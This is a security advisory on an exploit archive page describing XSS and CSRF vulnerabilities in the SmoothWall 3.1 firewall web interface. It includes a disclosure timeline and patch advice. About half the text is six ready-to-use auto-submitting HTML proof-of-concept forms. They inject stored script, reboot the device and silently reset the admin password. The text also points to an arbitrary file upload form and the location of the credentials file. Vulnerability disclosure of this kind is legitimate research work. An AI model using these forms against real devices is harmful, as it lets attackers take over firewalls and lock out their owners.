exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SmoothWall 3.1 Cross Site Request Forgery / Cross Site Scripting

SmoothWall 3.1 Cross Site Request Forgery / Cross Site Scripting
Posted Dec 22, 2014
Authored by Yann CAM

SmoothWall version 3.1 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | 0ecd6b1d2c66cc12e55433bc1802ad78969ec513f2f9896445b3df9992cf57b2

SmoothWall 3.1 Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
######################################################################
# Exploit Title: SmoothWall 3.1 Multiple vulnerabilities
# Date: 21/12/2014
# Author: Yann CAM @ Synetis
# Vendor or Software Link: www.smoothwall.org - www.smoothwall.org/download/
# Version: 3.1
# Category: CSRF password reset & XSS persistent
# Google dork:
# Tested on: Smoothwall Linux distribution
######################################################################


Smoothwall firewall/router distribution description :
======================================================================

Smoothwall is a Linux distribution designed to be used as an open source firewall. Designed for ease of use, Smoothwall is configured via a web-based GUI, and requires little or no knowledge of Linux to install or use.
Smoothwall is also a private software company based in the UK that develops firewall and web content filtering software, and which also maintains the SmoothWall open source project.

In version 3.0 SP3, many XSS persistent and CSRF vulnerabilities are present (test on march 2013). Dave B has already published some XSS PoC in a January 17, 2011, which have not been corrected (exploit-db 16006).
The present advisory adds new persistent XSS vectors and PoC for a similar impact. The SmoothWall 3.1 released on october 2014, is still affected by these attack vectors.

Smoothwall webGui is simply protected by a Basic Auth (htaccess) without session token. So any page is CSRF vulnerable.
The httpd daemon listens on HTTP on port 81 and HTTPS on port 441.


Proof of Concept 1 :
======================================================================

XSS persistent through POST : affect SmoothWall 3.0SP3 and 3.1

File /httpd/cgi-bin/pppsetup.cgi line 365 :
print "\t<OPTION VALUE='$c' $selected{'PROFILE'}{$c}>$profilenames[$c]\n";

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/pppsetup.cgi' method='post'>
<input type='hidden' name='PROFILENAME' value='<script>alert(/XSS from Yann CAM @ Synetis/);</script>' />
<input type='hidden' name='PROFILE' value='1' />
<input type='hidden' name='COMPORT' value='ttyS0' />
<input type='hidden' name='DTERATE' value='9600' />
<input type='hidden' name='TELEPHONE' value='' />
<input type='hidden' name='DIALMODE' value='T' />
<input type='hidden' name='MAXRETRIES' value='' />
<input type='hidden' name='TIMEOUT' value='' />
<input type='hidden' name='USERNAME' value='' />
<input type='hidden' name='PASSWORD' value='' />
<input type='hidden' name='AUTH' value='pap-or-chap' />
<input type='hidden' name='LOGINSCRIPT' value='' />
<input type='hidden' name='ACTION' value='Save' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>

This XSS is persistent into the /cgi-bin/pppsetup.cgi page and /cgi-bin/logs.cgi/log.dat from these kind of lines :
File /httpd/cgi-bin/pppsetup.cgi (many occurences) :
&log("$tr{'profile deleted'} $pppsettings{'PROFILENAME'}");


Proof of Concept 2 :
======================================================================

XSS persistent through POST : affect SmoothWall 3.0SP3

File /httpd/cgi-bin/vpn.cgi/vpnconfig.dat line 258 :
<td colspan='3'><strong>$tr{'commentc'}</strong> $temp[8]</td>

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/vpn.cgi/vpnconfig.dat' method='post'>
<input type='hidden' name='SECRET1' value='x' />
<input type='hidden' name='SECRET2' value='x' />
<input type='hidden' name='COMMENT' value='<script>alert(/XSS from Yann CAM @ Synetis/);</script>' />
<input type='hidden' name='ACTION' value='Add' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>

Detail :
$temp[8] isn't properly sanitize before to be used. This is persistent in this page.


Proof of Concept 3 :
======================================================================

XSS persistent through POST : affect SmoothWall 3.0SP3 and 3.1

File /httpd/cgi-bin/ddns.cgi line 273 :
&displaytable($filename, \%render_settings, $cgiparams{'ORDER'}, $cgiparams{'COLUMN'} );

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/ddns.cgi' method='post'>
<input type='hidden' name='COMMENT' value='<script>alert(/XSS from Yann CAM @ Synetis/);</script>' />
<input type='hidden' name='ACTION' value='Add' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>

Detail :
All POST params are transmitted to the &displaytable() function without any sanitization. The COMMENT var permit a persistent XSS in this page.


Proof of Concept 4 :
======================================================================

XSS non-persistent through POST, from Dave B, not corrected since 2011. Affect SmoothWall 3.0SP3 and 3.1.

File /httpd/cgi-bin/ipinfo.cgi line 76 and 101 :
&openbox("$addr ($hostname)");

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/ipinfo.cgi' method='post'>
<input type='hidden' name='IP' value='<script>alert(/XSS from Yann CAM @ Synetis/);</script>' />
<input type='hidden' name='ACTION' value='Run' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>

Detail :
$addr isn't properly sanitize before printed in the page. This is a non-persistent XSS.

Proof of Concept 5 :
======================================================================

CSRF for reboot SmoothWall, from Dave B, not corrected since 2011. Affect SmoothWall 3.0SP3 and 3.1.

File /httpd/cgi-bin/shutdown.cgi

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/shutdown.cgi' method='post'>
<input type='hidden' name='ACTION' value='Reboot' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>


Proof of Concept 6 :
======================================================================

CSRF for change SmoothWall password admin & dial account. Affect SmoothWall 3.0SP3 and 3.1.

File /httpd/cgi-bin/changepw.cgi

At least 6 characters alnum.

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/changepw.cgi' method='post'>
<input type='hidden' name='ADMIN_PASSWORD1' value='newpassword' />
<input type='hidden' name='ADMIN_PASSWORD2' value='newpassword' />
<input type='hidden' name='DIAL_PASSWORD1' value='newpassword' />
<input type='hidden' name='DIAL_PASSWORD1' value='newpassword' />
<input type='hidden' name='ACTION_DIAL' value='Save' />
<input type='hidden' name='ACTION_ADMIN' value='Save' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>


How to prevent and protect from these vuln ?
======================================================================

For example, concerning the PoC n°1 in the file /httpd/cgi-bin/pppsetup.cgi :

To protect and prevent SmoothWall from XSS, include CGI module in the header of each vuln page (like pppsetup.cgi) :
use CGI qw(:standard);

Then, at the line 365, sanitize the $profilenames[$c] var like this :
print "\t<OPTION VALUE='$c' $selected{'PROFILE'}{$c}>" . escapeHTML($profilenames[$c]) . "\n";

And for the log page, sanitize in all file the log function call :
&log("$tr{'profile deleted'} " . escapeHTML($pppsettings{'PROFILENAME'}));

Finally, to prevent from CSRF attack, add a token mechanism on all page, or simply check the referer of each request before using POST variables (like in the IPCop firewall/router distribution, which is initially a SmoothWall fork).


Additional note :
======================================================================

It's possible to upload arbitrary file with custom content on the system. But the file is renamed to /var/smoothwall/adsl/mgmt.o.
Use the upload form here : http://SMOOTHWALL_IP:81/cgi-bin/alcateladslfw.cgi

The htpasswd file with admin & dial credentials to access webgui is located here : /var/smoothwall/auth/users


Solution:
======================================================================
2014-24-12 : None official. Users of SmoothWall need to apply patch himself.


Report timeline :
======================================================================

2013-26-03 : Team alerted with details & PoC.
2013-04-09 : Second alert sent to the team
2013-04-09 : First team response (06:00pm) who claims to have knowledge of these bugs and is not considered as issues.
2013-04-10 : Second team response (01:18am), with consideration of these vulns but, I quote : "I was told that while this is a "potential" vulnerability it requires several things to happen for this to be an actual vulnerability."
2013-04-12 : My next response, with details on "how to protect SmootWall from these vulns", and many links pointed to CSRF attacks references and considered as critical.
2014-10-11 : SmootWall 3.1 released, still affected by these issues.
2014-12-21 : Public advisory with some tips to patch manually the solution (from Dave B. advisory in january 2011 to SmoothWall 3.1 in october 2014, there was no official patches).


Additional resources :
======================================================================

- www.smoothwall.org
- www.asafety.fr
- www.exploit-db.com/exploits/16006/
- www.securecoding.cert.org/confluence/display/perl/IDS33-PL.+Sanitize+untrusted+data+passed+across+a+trust+boundary


Credits :
======================================================================
Yann CAM - Security Consultant @ ASafety

--
CONTACT: www.asafety.fr
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close